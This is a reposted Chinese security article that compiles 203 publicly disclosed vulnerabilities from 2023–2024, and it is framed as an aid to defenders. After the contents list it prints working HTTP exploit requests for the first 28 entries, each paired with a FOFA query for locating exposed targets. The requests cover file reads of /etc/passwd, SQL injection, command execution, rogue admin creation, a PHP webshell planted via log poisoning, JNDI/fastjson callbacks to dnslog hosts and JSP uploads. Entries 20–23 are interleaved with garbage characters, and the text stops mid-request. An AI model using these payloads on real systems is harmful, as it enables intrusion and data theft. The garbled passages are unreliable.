Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reposted from 网络安全新视界; author: 网络安全新视界.

Purpose: Exploitation of N-day vulnerabilities makes up a large share of the attacks seen in offensive and defensive security work, and we hope this article helps with everyone's defence. Defenders can use its contents to check their own exposure.

Vulnerability sources: This article covers 203 POCs for high-severity vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Security patches: All of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: Because of length limits, a few POCs that were too long are replaced uniformly with the word PAYLOAD; search for the full POC yourself if you need it.

Legal rights: If this article infringes any party's legitimate rights, contact the 网络安全新视界 team through the account backend to have the relevant content removed.

Statement

To simplify things and make browsing easier, there is no "reply to get the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you find it useful. You can also follow this public account (网络安全新视界).

Contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. DBAppSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰 Smart S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰 Smart S20 backend sysmanageajax.php SQL injection
120. 北京百绰 Smart S40 management platform import web.php arbitrary file upload
121. 北京百绰 Smart S42 management platform userattestation.php arbitrary file upload
122. 北京百绰 Smart s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD licence-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit system assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 hash of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the backend with the default account admin, perform the following operation:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"

------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword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
Host: x.x.x.x

The payload is the following statement, double URL-encoded:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#


10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"
After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


POST request: the injected function executes a base64-encoded command.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword


Send the following request to the test range to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function that computes the MD5 hash of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
 <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
 <netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
 </ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

* q) o; H( {/ x/ K' _5 U, w20. 大华ICC智能物联综合管理平台任意文件读取
( X' k% y5 F9 j/ o7 O" |FOFA:body="*客户端会小于800*"/ M8 B; r; F: C- u3 w' Y
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.11 w( C% n+ N# n2 I
Host: x.x.x.x3 c* n- C" U6 t' l! F
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% p6 U4 n: y+ b
Connection: close1 ^! j& I( L4 D+ A- m
Accept: */*0 [. c+ w }2 i ]( j# u
Accept-Language: en
8 S' c e* b( |* o: g6 Z: eAccept-Encoding: gzip
. Q5 }8 x. h7 b6 |2 W/ j7 O3 n3 k: A4 f4 u7 P) z
# r3 A* A( n. _+ i! Y& O% Y21. 大华ICC智能物联综合管理平台random远程代码执行: Z- o0 }- e [0 w6 t5 `
FOFA:icon_hash="-1935899595"2 O% o3 {' T4 p$ k' d, X$ H7 j
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
. Q# z. U. E$ G" U- E5 ~1 \Host: x.x.x.x
# T3 }( Z" M# \* lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) ]+ y: J7 |4 lContent-Length: 161; T; K8 K0 c9 O3 o( L
Accept-Encoding: gzip0 i" C$ |5 [4 J: g* Q: V1 T
Connection: close4 u6 l: V4 R+ z2 a$ J
Content-Type: application/json;charset=utf-8* [; C! L2 C& Z' m+ e% k2 E3 S
7 v! A# Q0 o, n/ s3 L8 U9 ~4 U{
7 p* j3 q0 F) N& }, w* _' H# z"a":{
/ |/ m) T$ Z$ _. V" P8 k/ D9 s "@type":"com.alibaba.fastjson.JSONObject",2 P' U7 q. Y p/ m R
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}% e* u6 X% u+ _4 o# A" y
}""
4 a2 j- I: C3 T, N( O}
' h/ B; ~7 p Q, [9 v6 o4 J6 d3 V6 b4 b+ C( C' E) D) R3 S! \
: t2 x3 M% |4 X7 c/ g' T
22. 大华ICC智能物联综合管理平台 log4j远程代码执行2 p7 I d1 {5 Z( q6 n# n( _; G
FOFA:icon_hash="-1935899595"
/ J* L; q. m1 GPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.19 ~$ l0 \& \0 l7 ^$ ?% [- r
Host: your-ip
9 b( c# x' C+ t0 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* s0 \2 G# y5 v8 oContent-Type: application/json;charset=utf-8
2 W' e+ h ^* D( j: G3 v" R
/ t; G. s# q4 n8 G' m: O6 d( j{
9 x' Z7 d* }% M+ p"loginName":"${jndi:ldap://dnslog}"# _, ?1 S0 |2 [1 a2 ?4 K
}& [, \. a( t6 z4 }' z& O4 v% C6 V
$ B7 o/ g, m( t3 ~9 t
+ o* F6 C% {- q- z6 m& e
) V* J! N. O1 a; F+ R( Y23. 大华ICC智能物联综合管理平台 fastjson远程代码执行8 h/ ^; p! E0 T
FOFA:icon_hash="-1935899595"
- n3 f$ ~1 k. V0 E6 k5 _" D: nPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
s. V/ l: W! DHost: your-ip' ~$ f. G5 z& ]. D- q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ c( R- p2 Y4 O! W7 C9 v
Content-Type: application/json;charset=utf-8: g' Q8 M: W: ?0 i: h2 m
Accept-Encoding: gzip" x) N( Z I) }( f; [, R; j% N! X
Connection: close
/ \6 E! C$ u6 U9 j* v9 |: v0 q
, Q7 L( `8 i$ p9 N7 r{; h9 G" u0 Z0 D7 Y# ]
"a":{
9 w/ _+ o, R# l8 i "@type":"com.alibaba.fastjson.JSONObject",1 u' U- c" c' Y% }: K' n5 H% d
{"@type":"java.net.URL","val":"http://DNSLOG"}
) l. ~" R7 n. Q0 w$ Q }""! P, F& \1 J: ]3 i$ f6 c5 R1 A
}
2 R( K- x, s+ W& V/ B9 x: M7 k3 s/ s" D
, {( x8 F, R! n4 h7 ~
24. Yonyou NC (用友NC) 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

M\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-Type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
